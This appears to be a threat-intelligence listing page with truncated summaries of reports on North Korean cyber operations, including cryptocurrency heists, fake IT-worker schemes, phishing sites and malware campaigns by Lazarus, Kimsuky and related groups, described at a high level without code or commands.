654 reports
The Penn State law article examines how North Korea uses cryptocurrency theft, especially against decentralized finance platforms, as an alternative revenue source under sanctions tied to its weapons programs. It argues that DeFi’s limited consumer protec…
DTEX describes DPRK remote IT-worker hiring attempts against Western organizations, including aerospace, defense, retail, and technology companies, and frames the risk as insider access that can support revenue generation, espionage, data theft, and disru…
Upon learning that his two main contributors to the LSM were directly linked to North Korea, Zaki should have immediately acted to address these concerns. Though described as a “rewrite,” their work mostly involved porting the original code for SDK compat…
They have previously targeted specific individuals such as North Korean defectors and experts in North Korean affairs using hacking emails, Android app package file (.apk), and IE vulnerabilities. The North Korean threat actor TA-RedAnt (also known as Red…
AhnLab ASEC and South Korea's NCSC describe a TA-RedAnt operation exploiting CVE-2024-38178, a Microsoft Internet Explorer scripting-engine type-confusion vulnerability, through a compromised domestic advertising-content delivery path. The attackers inser…
Microsoft's 2024 Digital Defense Report describes a more complex and dangerous cyber threat landscape in which nation-state and criminal actors are better resourced and more prepared. The excerpt says Microsoft and its customers face large volumes of atta…
Microstep Intelligence says Lazarus continues to target cryptocurrency-related personnel through fake recruiting and research projects posted on LinkedIn, X, Facebook, GitHub, and Stack Overflow. After moving victims into Telegram conversations, the opera…
A Kimsuky-linked Windows shortcut sample is disguised as a PDF guide about coin futures trading and is described as targeting people interested in cryptocurrency or futures trading. The LNK launches hidden, non-interactive PowerShell, builds a Dropboxuser…
Hauri reports that Lazarus is distributing InvisibleFerret malware through job-task lures aimed at job seekers, continuing to abuse GitHub repositories while changing obfuscation methods and adding keylogging capability. The analyzed downloader retrieves …
DoubleAgent analyzes a newly identified Linux variant of DPRK-attributed FASTCash malware built for payment-switch environments that process card transactions. The Ubuntu 20.04 sample adds to earlier AIX and Windows FASTCash variants and appears related t…
The report documents a Kimsuky-attributed phishing site impersonating Yonsei University webmail at rfa.lol/yonsei, with visual elements and contact details intended to make the fake login page appear legitimate. Captured request details show submitted use…
A Windows shortcut file is assessed by the author as suspected Konni activity, with the caveat that the attribution is not official. The lure is named as a domestic COVID-19 reinfection status PDF, suggesting possible interest in medical or public-health …
Silent Chollima, a North Korea-nexus actor also tracked as Stonefly, Andariel, Onyx Sleet, TDrop2, and DarkSeoul, was observed moving from its traditional espionage focus into apparent extortion and other financially motivated activity. Symantec-linked re…
Cobo analyzes the July 2024 WazirX incident as a Safe multisig compromise that let attackers transfer about $230 million in assets from an Indian exchange wallet. The wallet used a four-of-six approval model, with five WazirX hardware-wallet signers and o…
QuillAudits describes the September 2024 BingX hot-wallet breach, where attackers stole about $44.7 million and moved funds across multiple blockchains to complicate tracing. The source identifies drained BingX wallet addresses, attacker-controlled Ethere…